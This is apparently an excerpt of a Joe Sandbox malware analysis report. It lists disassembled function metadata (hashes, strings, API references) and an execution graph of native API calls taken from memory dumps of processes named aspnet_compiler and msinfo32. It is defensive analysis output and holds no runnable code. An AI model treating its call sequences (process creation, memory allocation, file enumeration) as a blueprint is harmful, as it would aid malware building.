                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 0-871070163
                                                                                                        • Opcode ID: a8945b0a901bb0cee010d9083f1b3b4de52c8c7fb12f6c6cc783b5a1052629ee
                                                                                                        • Instruction ID: fd6ccc584bf2fd097578c345ec684be7de703271263dfe5acbf62db3b2ad789c
                                                                                                        • Opcode Fuzzy Hash: a8945b0a901bb0cee010d9083f1b3b4de52c8c7fb12f6c6cc783b5a1052629ee
                                                                                                        • Instruction Fuzzy Hash: 7441D0313057069FD725DE29C890BABF7E5EF89710F000A1DEE5ADB680DB71E9058B92
                                                                                                        Function 017BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017F728C
                                                                                                        Strings
                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 017F7294
                                                                                                        • RTL: Resource at %p, xrefs: 017F72A3
                                                                                                        • RTL: Re-Waiting, xrefs: 017F72C1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 885266447-605551621
                                                                                                        • Opcode ID: 5a0736597fb19b8a92665a0a149c9e7b3bf17dae5269e55c4dc9bfc7a91c5b71
                                                                                                        • Instruction ID: fefe65392ec668e556c7380e6d2cd118338708a920dfbd77f6a93f5b737a5ec9
                                                                                                        • Opcode Fuzzy Hash: 5a0736597fb19b8a92665a0a149c9e7b3bf17dae5269e55c4dc9bfc7a91c5b71
                                                                                                        • Instruction Fuzzy Hash: 1F41EE35608206ABD725DE29CC81BAAF7A5FB94710F10061DFE55EB380DB20F8428BD2
                                                                                                        Function 017C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-
                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction ID: 51c13322966954e1fd1f4b37421245bfe125088e23f13807359098702ba58618
                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction Fuzzy Hash: C591A371E0021A9BEB28DF6DC8C16BEFBA5AF44B20F54451EE955E72C4DF3099818F11
                                                                                                        Function 01789126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$@
                                                                                                        • API String ID: 0-1194432280
                                                                                                        • Opcode ID: 203b7afd5af4ccfcad0428c0718014e9441ec7b1ab876b9ddc6c3cfdb6c57d27
                                                                                                        • Instruction ID: 375d009416e471b1e8872bab0c1172700e7076b88954f1d73cc1192a39d23e2e
                                                                                                        • Opcode Fuzzy Hash: 203b7afd5af4ccfcad0428c0718014e9441ec7b1ab876b9ddc6c3cfdb6c57d27
                                                                                                        • Instruction Fuzzy Hash: FB811C71D002699BDB31DB54CC48BEEB7B8AB48714F1041DAEA19B7640E7709E84CFA0
                                                                                                        Function 0180CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0180CFBD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallFilterFunc@8
                                                                                                        • String ID: @$@4Qw@4Qw
                                                                                                        • API String ID: 4062629308-2383119779
                                                                                                        • Opcode ID: cda5911a93a143d03ead4bb4fefa717ac0ec4b91a3a9d8fe5ac857f06a8ab038
                                                                                                        • Instruction ID: 7a634384615705f00777626810b9d2cbce280d12249990f72f4661d974e0511c
                                                                                                        • Opcode Fuzzy Hash: cda5911a93a143d03ead4bb4fefa717ac0ec4b91a3a9d8fe5ac857f06a8ab038
                                                                                                        • Instruction Fuzzy Hash: FD41B071900219DFDB22DFE9C884A6AFBB8FF54B40F10422EE914DB298D774CA05CB51

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:3.1%
                                                                                                        Dynamic/Decrypted Code Coverage:4.2%
                                                                                                        Signature Coverage:1.5%
                                                                                                        Total number of Nodes:453
                                                                                                        Total number of Limit Nodes:75
                                                                                                        execution_graph 81537 2eb2c2a 81538 2eb2c4f 81537->81538 81541 2eb67b0 81538->81541 81540 2eb2c63 81542 2eb67e3 81541->81542 81543 2eb6807 81542->81543 81548 2ec94d0 81542->81548 81543->81540 81545 2eb682a 81545->81543 81552 2ec9960 81545->81552 81547 2eb68ac 81547->81540 81549 2ec94ed 81548->81549 81555 4e82ca0 LdrInitializeThunk 81549->81555 81550 2ec9519 81550->81545 81553 2ec997a 81552->81553 81554 2ec998b NtClose 81553->81554 81554->81547 81555->81550 81558 2eb60a0 81563 2eb85c0 81558->81563 81560 2eb60d0 81562 2eb60fc 81560->81562 81567 2eb8540 81560->81567 81564 2eb85d3 81563->81564 81574 2ec8e90 81564->81574 81566 2eb85fe 81566->81560 81568 2eb8584 81567->81568 81573 2eb85a5 81568->81573 81580 2ec8c60 81568->81580 81570 2eb8595 81571 2eb85b1 81570->81571 81572 2ec9960 NtClose 81570->81572 81571->81560 81572->81573 81573->81560 81575 2ec8f0b 81574->81575 81577 2ec8ebb 81574->81577 81579 4e82dd0 LdrInitializeThunk 81575->81579 81576 2ec8f30 81576->81566 81577->81566 81579->81576 81581 2ec8cda 81580->81581 81582 2ec8c8b 81580->81582 81585 4e84650 LdrInitializeThunk 81581->81585 81582->81570 81583 2ec8cff 81583->81570 81585->81583 81586 2eb8ce7 81587 2eb8cea 81586->81587 81588 2eb8ca1 81587->81588 81590 2eb75a0 81587->81590 81591 2eb75b6 81590->81591 81593 2eb75ef 81590->81593 81591->81593 81594 2eb7410 LdrLoadDll 81591->81594 81593->81588 81594->81593 81600 2ec9660 81601 2ec9717 81600->81601 81603 2ec9692 81600->81603 81602 2ec972d NtCreateFile 81601->81602 81609 2eb7624 81610 2eb762d 81609->81610 81611 2ec9960 NtClose 81610->81611 81618 2eb768b 81610->81618 81613 2eb7653 81611->81613 81612 2eb77bd 81619 2eb6a40 NtClose LdrInitializeThunk LdrInitializeThunk 81613->81619 81616 2eb779d 81616->81612 81621 2eb6c10 NtClose LdrInitializeThunk LdrInitializeThunk 81616->81621 81618->81612 81620 2eb6a40 NtClose LdrInitializeThunk LdrInitializeThunk 81618->81620 81619->81618 81620->81616 81621->81612 81623 2ea9e30 81624 2ea9e3f 81623->81624 81625 2ea9e80 81624->81625 81626 2ea9e6d CreateThread 81624->81626 81627 2eaba30 81629 2ead0a1 81627->81629 81630 2ecb9b0 81627->81630 81633 2ec9ac0 81630->81633 81632 2ecb9e1 81632->81629 81634 2ec9b52 81633->81634 81636 2ec9aeb 81633->81636 81635 2ec9b68 NtAllocateVirtualMemory 81634->81635 81635->81632 81636->81632 81637 2ebcab0 81638 2ebcad9 81637->81638 81639 2ebcbdd 81638->81639 81640 2ebcb83 FindFirstFileW 81638->81640 81640->81639 81642 2ebcb9e 81640->81642 81641 2ebcbc4 FindNextFileW 81641->81642 81643 2ebcbd6 FindClose 81641->81643 81642->81641 81643->81639 81644 2eb2770 81649 2ec8f90 81644->81649 81648 2eb27bb 81650 2ec8faa 81649->81650 81658 4e82c0a 81650->81658 81651 2eb27a6 81653 2ec99f0 81651->81653 81654 2ec9a1e 81653->81654 81655 2ec9a7f 81653->81655 81654->81648 81661 4e82e80 LdrInitializeThunk 81655->81661 81656 2ec9ab0 81656->81648 81659 4e82c1f LdrInitializeThunk 81658->81659 81660 4e82c11 81658->81660 81659->81651 81660->81651 81661->81656 81662 2ec1c30 81663 2ec1c4c 81662->81663 81664 2ec1c88 81663->81664 81665 2ec1c74 81663->81665 81667 2ec9960 NtClose 81664->81667 81666 2ec9960 NtClose 81665->81666 81668 2ec1c7d 81666->81668 81669 2ec1c91 81667->81669 81672 2ecbb60 RtlAllocateHeap 81669->81672 81671 2ec1c9c 81672->81671 81678 2eb130b 81679 2eb131f 81678->81679 81680 2eb1313 PostThreadMessageW 81678->81680 81680->81679 81681 2eb7280 81682 2eb72a9 81681->81682 81685 2eb83f0 81682->81685 81684 2eb72cd 81686 2eb840d 81685->81686 81692 2ec9080 81686->81692 81688 2eb845d 81689 2eb8464 81688->81689 81697 2ec9160 81688->81697 81689->81684 81691 2eb848d 81691->81684 81693 2ec911b 81692->81693 81694 2ec90ae 81692->81694 81702 4e82f30 LdrInitializeThunk 81693->81702 81694->81688 81695 2ec9154 81695->81688 81698 2ec920a 81697->81698 81699 2ec918b 81697->81699 81703 4e82d10 LdrInitializeThunk 81698->81703 81699->81691 81700 2ec924f 81700->81691 81702->81695 81703->81700 81704 2eb7800 81705 2eb7814 81704->81705 81707 2eb786e 81704->81707 81705->81707 81708 2ebb740 81705->81708 81709 2ebb766 81708->81709 81710 2ebb989 81709->81710 81737 2ec9d50 81709->81737 81710->81707 81712 2ebb7e2 81712->81710 81740 2eccc10 81712->81740 81714 2ebb801 81714->81710 81715 2ebb8cb 81714->81715 81717 2ec8f90 LdrInitializeThunk 81714->81717 81716 2ebb8e4 81715->81716 81719 2eb6020 LdrInitializeThunk 81715->81719 81750 2ec5bc0 81716->81750 81720 2ebb85f 81717->81720 81719->81716 81720->81715 81723 2ebb868 81720->81723 81721 2ebb8b3 81726 2eb85c0 LdrInitializeThunk 81721->81726 81722 2ebb894 81770 2ec4c10 LdrInitializeThunk 81722->81770 81723->81710 81723->81721 81723->81722 81746 2eb6020 81723->81746 81724 2ebb971 81731 2eb85c0 LdrInitializeThunk 81724->81731 81725 2ebb90e 81725->81724 81755 2ec8b00 81725->81755 81730 2ebb8c1 81726->81730 81730->81707 81733 2ebb97f 81731->81733 81732 2ebb948 81760 2ec8bb0 81732->81760 81733->81707 81735 2ebb962 81765 2ec8d10 81735->81765 81738 2ec9d6d 81737->81738 81739 2ec9d7e CreateProcessInternalW 81738->81739 81739->81712 81741 2eccb80 81740->81741 81742 2eccbdd 81741->81742 81771 2ecbb20 81741->81771 81742->81714 81744 2eccbba 81774 2ecba40 81744->81774 81747 2eb6026 81746->81747 81748 2ec9160 LdrInitializeThunk 81747->81748 81749 2eb605e 81748->81749 81749->81722 81751 2ec5c25 81750->81751 81752 2ec5c60 81751->81752 81783 2eb5df0 81751->81783 81752->81725 81754 2ec5c42 81754->81725 81756 2ec8b7d 81755->81756 81758 2ec8b2e 81755->81758 81787 4e839b0 LdrInitializeThunk 81756->81787 81757 2ec8ba2 81757->81732 81758->81732 81761 2ec8c2d 81760->81761 81763 2ec8bde 81760->81763 81788 4e84340 LdrInitializeThunk 81761->81788 81762 2ec8c52 81762->81735 81763->81735 81766 2ec8d8a 81765->81766 81767 2ec8d3b 81765->81767 81789 4e82fb0 LdrInitializeThunk 81766->81789 81767->81724 81768 2ec8daf 81768->81724 81770->81721 81777 2ec9c70 81771->81777 81773 2ecbb3b 81773->81744 81780 2ec9cc0 81774->81780 81776 2ecba59 81776->81742 81778 2ec9c8a 81777->81778 81779 2ec9c9b RtlAllocateHeap 81778->81779 81779->81773 81781 2ec9cda 81780->81781 81782 2ec9ceb RtlFreeHeap 81781->81782 81782->81776 81784 2eb5d90 81783->81784 81785 2eb85c0 LdrInitializeThunk 81784->81785 81786 2eb5da7 81784->81786 81785->81784 81786->81754 81787->81757 81788->81762 81789->81768 81790 2ebfd00 81791 2ebfd64 81790->81791 81792 2eb67b0 2 API calls 81791->81792 81794 2ebfe97 81792->81794 81793 2ebfe9e 81794->81793 81821 2eb68c0 81794->81821 81798 2ebff3e 81799 2ec0052 81798->81799 81830 2ebfae0 81798->81830 81801 2ec9960 NtClose 81799->81801 81802 2ec005c 81801->81802 81803 2ebff56 81803->81799 81804 2ebff61 81803->81804 81805 2ecbb20 RtlAllocateHeap 81804->81805 81806 2ebff8a 81805->81806 81807 2ebffa9 81806->81807 81808 2ebff93 81806->81808 81839 2ebf9d0 CoInitialize 81807->81839 81809 2ec9960 NtClose 81808->81809 81811 2ebff9d 81809->81811 81812 2ebffb7 81842 2ec9420 81812->81842 81814 2ec0032 81815 2ec9960 NtClose 81814->81815 81816 2ec003c 81815->81816 81818 2ecba40 RtlFreeHeap 81816->81818 81817 2ebffd5 81817->81814 81820 2ec9420 LdrInitializeThunk 81817->81820 81819 2ec0043 81818->81819 81820->81817 81822 2eb68e5 81821->81822 81846 2ec92b0 81822->81846 81825 2ec7330 81826 2ec7394 81825->81826 81827 2ec73c7 81826->81827 81851 2ec08ff RtlFreeHeap 81826->81851 81827->81798 81829 2ec73a9 81829->81798 81831 2ebfafc 81830->81831 81852 2eb4a30 81831->81852 81833 2ebfb23 81833->81803 81834 2ebfb1a 81834->81833 81835 2eb4a30 LdrLoadDll 81834->81835 81836 2ebfbee 81835->81836 81837 2eb4a30 LdrLoadDll 81836->81837 81838 2ebfc48 81836->81838 81837->81838 81838->81803 81841 2ebfa35 81839->81841 81840 2ebfacb CoUninitialize 81840->81812 81841->81840 81843 2ec943d 81842->81843 81856 4e82ba0 LdrInitializeThunk 81843->81856 81844 2ec946d 81844->81817 81847 2ec92cd 81846->81847 81850 4e82c60 LdrInitializeThunk 81847->81850 81848 2eb6959 81848->81819 81848->81825 81850->81848 81851->81829 81853 2eb4a54 81852->81853 81854 2eb4a90 LdrLoadDll 81853->81854 81855 2eb4a5b 81853->81855 81854->81855 81855->81834 81856->81844 81857 2ec98c0 81858 2ec98ee 81857->81858 81859 2ec9937 81857->81859 81860 2ec994d NtDeleteFile 81859->81860 81861 2eccb40 81862 2ecba40 RtlFreeHeap 81861->81862 81863 2eccb55 81862->81863 81864 2ec0600 81865 2ec0623 81864->81865 81866 2eb4a30 LdrLoadDll 81865->81866 81867 2ec0647 81866->81867 81868 2ec7330 RtlFreeHeap 81867->81868 81869 2ec07ce 81867->81869 81868->81869 81870 2ec8dc0 81871 2ec8e4f 81870->81871 81873 2ec8dee 81870->81873 81875 4e82ee0 LdrInitializeThunk 81871->81875 81872 2ec8e80 81875->81872 81876 2ec1fc0 81877 2ec1fd9 81876->81877 81878 2ec2024 81877->81878 81881 2ec2064 81877->81881 81883 2ec2069 81877->81883 81879 2ecba40 RtlFreeHeap 81878->81879 81880 2ec2034 81879->81880 81882 2ecba40 RtlFreeHeap 81881->81882 81882->81883 81884 2ec6500 81885 2ec655a 81884->81885 81887 2ec6567 81885->81887 81888 2ec3f20 81885->81888 81889 2ecb9b0 NtAllocateVirtualMemory 81888->81889 81890 2ec3f5d 81889->81890 81891 2ec405f 81890->81891 81892 2eb4a30 LdrLoadDll 81890->81892 81891->81887 81894 2ec3fa3 81892->81894 81893 2ec3fe1 Sleep 81893->81894 81894->81891 81894->81893 81895 2ec8f40 81896 2ec8f5d 81895->81896 81899 4e82df0 LdrInitializeThunk 81896->81899 81897 2ec8f85 81899->81897 81900 2eba0df 81901 2eba0ef 81900->81901 81902 2eba0f6 81901->81902 81903 2ecba40 RtlFreeHeap 81901->81903 81903->81902 81904 4e82ad0 LdrInitializeThunk 81905 2eb35d3 81910 2eb8240 81905->81910 81908 2ec9960 NtClose 81909 2eb35ff 81908->81909 81911 2eb35e3 81910->81911 81912 2eb825a 81910->81912 81911->81908 81911->81909 81916 2ec9030 81912->81916 81915 2ec9960 NtClose 81915->81911 81917 2ec904d 81916->81917 81920 4e835c0 LdrInitializeThunk 81917->81920 81918 2eb832a 81918->81915 81920->81918 81921 2ea9e90 81922 2eaa27d 81921->81922 81924 2eaa776 81922->81924 81925 2ecb6a0 81922->81925 81926 2ecb6c6 81925->81926 81931 2ea40b0 81926->81931 81928 2ecb6d2 81929 2ecb70b 81928->81929 81937 2ec5a90 81928->81937 81929->81924 81941 2eb36e0 81931->81941 81933 2ea40bd 81934 2ea40c4 81933->81934 81945 2eb3650 RtlFreeHeap LdrInitializeThunk 81933->81945 81934->81928 81936 2ea40cd 81936->81928 81938 2ec5af2 81937->81938 81940 2ec5aff 81938->81940 81953 2eb1ee0 81938->81953 81940->81929 81942 2eb36fd 81941->81942 81944 2eb3716 81942->81944 81946 2eca3c0 81942->81946 81944->81933 81945->81936 81948 2eca3da 81946->81948 81947 2eca409 81947->81944 81948->81947 81949 2ec8f90 LdrInitializeThunk 81948->81949 81950 2eca469 81949->81950 81951 2ecba40 RtlFreeHeap 81950->81951 81952 2eca482 81951->81952 81952->81944 81954 2eb1f1b 81953->81954 81969 2eb8350 81954->81969 81956 2eb1f23 81957 2ecbb20 RtlAllocateHeap 81956->81957 81968 2eb21ea 81956->81968 81958 2eb1f39 81957->81958 81959 2ecbb20 RtlAllocateHeap 81958->81959 81960 2eb1f4a 81959->81960 81961 2ecbb20 RtlAllocateHeap 81960->81961 81963 2eb1f58 81961->81963 81964 2eb1fec 81963->81964 81984 2eb6f10 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 81963->81984 81965 2eb4a30 LdrLoadDll 81964->81965 81966 2eb21a2 81965->81966 81980 2ec83d0 81966->81980 81968->81940 81970 2eb837c 81969->81970 81971 2eb8240 2 API calls 81970->81971 81972 2eb839f 81971->81972 81973 2eb83a9 81972->81973 81974 2eb83c1 81972->81974 81976 2eb83b4 81973->81976 81977 2ec9960 NtClose 81973->81977 81975 2eb83dd 81974->81975 81978 2ec9960 NtClose 81974->81978 81975->81956 81976->81956 81977->81976 81979 2eb83d3 81978->81979 81979->81956 81981 2ec8431 81980->81981 81983 2ec843e 81981->81983 81985 2eb2200 81981->81985 81983->81968 81984->81964 82001 2eb8620 81985->82001 81987 2eb2220 81994 2eb2760 81987->81994 82005 2ec1610 81987->82005 81990 2eb2437 81992 2eccc10 2 API calls 81990->81992 81991 2eb227e 81991->81994 82008 2eccae0 81991->82008 81995 2eb244c 81992->81995 81993 2eb85c0 LdrInitializeThunk 81997 2eb2499 81993->81997 81994->81983 81995->81997 82013 2eb0d20 81995->82013 81997->81993 81997->81994 81999 2eb0d20 LdrInitializeThunk 81997->81999 81998 2eb85c0 LdrInitializeThunk 82000 2eb25ea 81998->82000 81999->81997 82000->81997 82000->81998 82002 2eb862d 82001->82002 82003 2eb864e SetErrorMode 82002->82003 82004 2eb8655 82002->82004 82003->82004 82004->81987 82006 2ecb9b0 NtAllocateVirtualMemory 82005->82006 82007 2ec1631 82006->82007 82007->81991 82009 2eccaf6 82008->82009 82010 2eccaf0 82008->82010 82011 2ecbb20 RtlAllocateHeap 82009->82011 82010->81990 82012 2eccb1c 82011->82012 82012->81990 82014 2eb0d39 82013->82014 82017 2ec9be0 82014->82017 82018 2ec9bfd 82017->82018 82021 4e82c70 LdrInitializeThunk 82018->82021 82019 2eb0d42 82019->82000 82021->82019 82022 2ebb210 82027 2ebaf20 82022->82027 82024 2ebb21d 82041 2ebaba0 82024->82041 82026 2ebb239 82028 2ebaf45 82027->82028 82052 2eb8830 82028->82052 82031 2ebb090 82031->82024 82033 2ebb0a7 82033->82024 82034 2ebb09e 82034->82033 82036 2ebb195 82034->82036 82071 2eba5f0 82034->82071 82038 2ebb1fa 82036->82038 82080 2eba960 82036->82080 82039 2ecba40 RtlFreeHeap 82038->82039 82040 2ebb201 82039->82040 82040->82024 82042 2ebabb6 82041->82042 82045 2ebabc1 82041->82045 82043 2ecbb20 RtlAllocateHeap 82042->82043 82043->82045 82044 2ebabe2 82044->82026 82045->82044 82046 2eb8830 GetFileAttributesW 82045->82046 82047 2ebaef5 82045->82047 82050 2eba5f0 RtlFreeHeap 82045->82050 82051 2eba960 RtlFreeHeap 82045->82051 82046->82045 82048 2ebaf0e 82047->82048 82049 2ecba40 RtlFreeHeap 82047->82049 82048->82026 82049->82048 82050->82045 82051->82045 82053 2eb8851 82052->82053 82054 2eb8858 GetFileAttributesW 82053->82054 82055 2eb8863 82053->82055 82054->82055 82055->82031 82056 2ec3810 82055->82056 82057 2ec381e 82056->82057 82058 2ec3825 82056->82058 82057->82034 82059 2eb4a30 LdrLoadDll 82058->82059 82060 2ec385a 82059->82060 82061 2ec3869 82060->82061 82084 2ec32d0 LdrLoadDll 82060->82084 82063 2ecbb20 RtlAllocateHeap 82061->82063 82067 2ec3a14 82061->82067 82064 2ec3882 82063->82064 82065 2ec3a0a 82064->82065 82064->82067 82068 2ec389e 82064->82068 82066 2ecba40 RtlFreeHeap 82065->82066 82065->82067 82066->82067 82067->82034 82068->82067 82069 2ecba40 RtlFreeHeap 82068->82069 82070 2ec39fe 82069->82070 82070->82034 82072 2eba616 82071->82072 82085 2ebe020 82072->82085 82074 2eba688 82076 2eba810 82074->82076 82078 2eba6a6 82074->82078 82075 2eba7f5 82075->82034 82076->82075 82077 2eba4b0 RtlFreeHeap 82076->82077 82077->82076 82078->82075 82090 2eba4b0 82078->82090 82081 2eba986 82080->82081 82082 2ebe020 RtlFreeHeap 82081->82082 82083 2ebaa0d 82082->82083 82083->82036 82084->82061 82087 2ebe044 82085->82087 82086 2ebe051 82086->82074 82087->82086 82088 2ecba40 RtlFreeHeap 82087->82088 82089 2ebe08e 82088->82089 82089->82074 82091 2eba4cd 82090->82091 82094 2ebe0a0 82091->82094 82093 2eba5d3 82093->82078 82095 2ebe0c4 82094->82095 82096 2ebe16e 82095->82096 82097 2ecba40 RtlFreeHeap 82095->82097 82096->82093 82097->82096 82098 2ec97d0 82099 2ec9874 82098->82099 82101 2ec97fb 82098->82101 82100 2ec988a NtReadFile 82099->82100

                                                                                                        Executed Functions

                                                                                                        Function 02EA9E90 Relevance: 44.2, Strings: 35, Instructions: 439COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 29 2ea9e90-2eaa27b 30 2eaa28c-2eaa298 29->30 31 2eaa29a-2eaa2a7 30->31 32 2eaa2a9-2eaa2b3 30->32 31->30 34 2eaa2c4-2eaa2cd 32->34 35 2eaa2cf-2eaa2e1 34->35 36 2eaa2e3-2eaa2f4 34->36 35->34 37 2eaa305-2eaa311 36->37 39 2eaa313-2eaa322 37->39 40 2eaa324 37->40 39->37 41 2eaa32b-2eaa332 40->41 43 2eaa370-2eaa381 41->43 44 2eaa334-2eaa340 41->44 47 2eaa392-2eaa39e 43->47 45 2eaa342-2eaa346 44->45 46 2eaa347-2eaa349 44->46 45->46 48 2eaa35a-2eaa36e 46->48 49 2eaa34b-2eaa354 46->49 50 2eaa3ae-2eaa3b7 47->50 51 2eaa3a0-2eaa3ac 47->51 48->41 49->48 52 2eaa6ec-2eaa6f6 50->52 53 2eaa3bd-2eaa3c4 50->53 51->47 56 2eaa707-2eaa713 52->56 55 2eaa3cf-2eaa3d6 53->55 57 2eaa3d8-2eaa41c 55->57 58 2eaa41e-2eaa425 55->58 59 2eaa729-2eaa730 56->59 60 2eaa715-2eaa727 56->60 57->55 61 2eaa457-2eaa45e 58->61 62 2eaa427-2eaa455 58->62 65 2eaa7c9-2eaa7d2 59->65 66 2eaa736-2eaa740 59->66 60->56 67 2eaa490-2eaa494 61->67 68 2eaa460-2eaa48e 61->68 62->58 69 2eaa751-2eaa75a 66->69 70 2eaa496-2eaa4b7 67->70 71 2eaa4d5-2eaa4d9 67->71 68->61 72 2eaa75c-2eaa76f 69->72 73 2eaa771 call 2ecb6a0 69->73 75 2eaa4b9-2eaa4c2 70->75 76 2eaa4c5-2eaa4d3 70->76 78 2eaa4db-2eaa500 71->78 79 2eaa502-2eaa51a 71->79 77 2eaa742-2eaa74b 72->77 80 2eaa776-2eaa780 73->80 75->76 76->67 77->69 78->71 81 2eaa5c0-2eaa5ca 79->81 82 2eaa520-2eaa52a 79->82 84 2eaa791-2eaa79b 80->84 85 2eaa5db-2eaa5e7 81->85 83 2eaa53b-2eaa544 82->83 86 2eaa546-2eaa552 83->86 87 2eaa554-2eaa55d 83->87 84->65 88 2eaa79d-2eaa7c7 84->88 89 2eaa5e9-2eaa5fb 85->89 90 2eaa5fd-2eaa607 85->90 86->83 95 2eaa55f-2eaa580 87->95 96 2eaa582-2eaa58c 87->96 88->84 89->85 91 2eaa618-2eaa624 90->91 97 2eaa626-2eaa635 91->97 98 2eaa637-2eaa640 91->98 95->87 99 2eaa59d-2eaa5a9 96->99 97->91 100 2eaa65c-2eaa666 98->100 101 2eaa642-2eaa65a 98->101 103 2eaa5bb 99->103 104 2eaa5ab-2eaa5b1 99->104 105 2eaa677-2eaa680 100->105 101->98 103->52 106 2eaa5b9 104->106 107 2eaa5b3-2eaa5b6 104->107 108 2eaa682-2eaa68e 105->108 109 2eaa690-2eaa694 105->109 106->99 107->106 108->105 111 2eaa6a0-2eaa6b4 109->111 112 2eaa696-2eaa69d 109->112 114 2eaa6c5-2eaa6d1 111->114 112->111 115 2eaa6d3-2eaa6e5 114->115 116 2eaa6e7 114->116 115->114 116->50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 2$C$"$'$'$)G$*z$+$+T$2$8$8c$9X$:$=I$@d+T$@v$M$Q:$Q:$TY$V1$Xh$Yn$_3$c'$el$i-$m$q$qc$x!$R$X$f
                                                                                                        • API String ID: 0-2129657031
                                                                                                        • Opcode ID: 108565699d01c33926b3b917b270382420b98e6dfb69b2be1cba35ec1ccb81b7
                                                                                                        • Instruction ID: f6931fffdcda75e4fb5cc9518de4418778da51005f925083438696c8de13fdd8
                                                                                                        • Opcode Fuzzy Hash: 108565699d01c33926b3b917b270382420b98e6dfb69b2be1cba35ec1ccb81b7
                                                                                                        • Instruction Fuzzy Hash: 003281B0D45228CBEB24CF85C9A47DDBBB2BB45308F1091DAD5097B380C7B96A89CF54
                                                                                                        Function 02EBCAB0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 02EBCB94
                                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 02EBCBCF
                                                                                                        • FindClose.KERNELBASE(?), ref: 02EBCBDA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 3541575487-0
                                                                                                        • Opcode ID: 71de5c7a3fffa2e830678768d777909897c705427e3925ffad69ae1480e16b89
                                                                                                        • Instruction ID: eb7109c283d7932da4c0c94123dfe375bc5908d2ac2f19b3701cd3300c9574d0
                                                                                                        • Opcode Fuzzy Hash: 71de5c7a3fffa2e830678768d777909897c705427e3925ffad69ae1480e16b89
                                                                                                        • Instruction Fuzzy Hash: 2C3196715803487FDB21DB64CC85FEF777D9F44708F20945DBA48AB180DB70AA858BA0
                                                                                                        Function 02EC9660 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtCreateFile.NTDLL(?,CC4F3AA0,?,?,?,?,?,?,?,?,?), ref: 02EC975E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
